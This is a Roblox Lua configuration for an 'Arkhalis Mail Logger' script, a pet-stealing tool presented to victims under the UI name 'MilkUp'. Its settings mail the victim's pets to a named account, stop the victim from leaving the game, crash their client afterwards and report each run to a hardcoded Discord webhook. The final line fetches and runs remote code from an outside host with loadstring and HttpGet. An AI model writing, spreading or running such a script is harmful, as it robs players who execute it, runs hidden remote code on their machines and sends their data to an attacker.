--[[ Arkhalis Mail Logger (Advanced) ]]--

--[[ Main Config ]]--

_G.Username = "Tienkg1598" --// Username To Send Pets To

_G.GiftMessage = "free pets" --// Message For The Gift To Say

_G.Diamonds = 500000 --// Amount Of Diamonds To Not Kick

_G.UnlockPets = true --// Unlocks Locked Pets

_G.AntiLeave = true --// Doesn't Let The Target Close Roblox

_G.Crash = true  --// Crashes Them After Its Finished

--[[ Webhook Config ]]--

_G.Enabled = true --// Toggle For Sending Webhooks

_G.Mention = false --// Pings You When Someone Executes

_G.Webhook = "https://discord.com/api/webhooks/1093196102561431662/-I50tx481qZfKwk969FHgFH7bHhybbnLUTdiTRLmbsTMhx0I3Jlw2Wq759uYtgE25gql" --// Discord Webhook For Executions

--[[ UI Config ]]--

_G.ScriptName = "MilkUp" --// Script Name On The UI

_G.Tip1 = "1" --// Gives You Tips On The UI

_G.Tip2 = "2" --// Gives You Tips On The UI

_G.Tip3 = "3" --// Gives You Tips On The UI

_G.Tip4 = "4" --// Gives You Tips On The UI

_G.Tip5 = "5" --// Gives You Tips On The UI

--[[ Loadstring ]]--

loadstring(game:HttpGet("https://fourdevils.gq/Arkhalis.lua", true))()

```
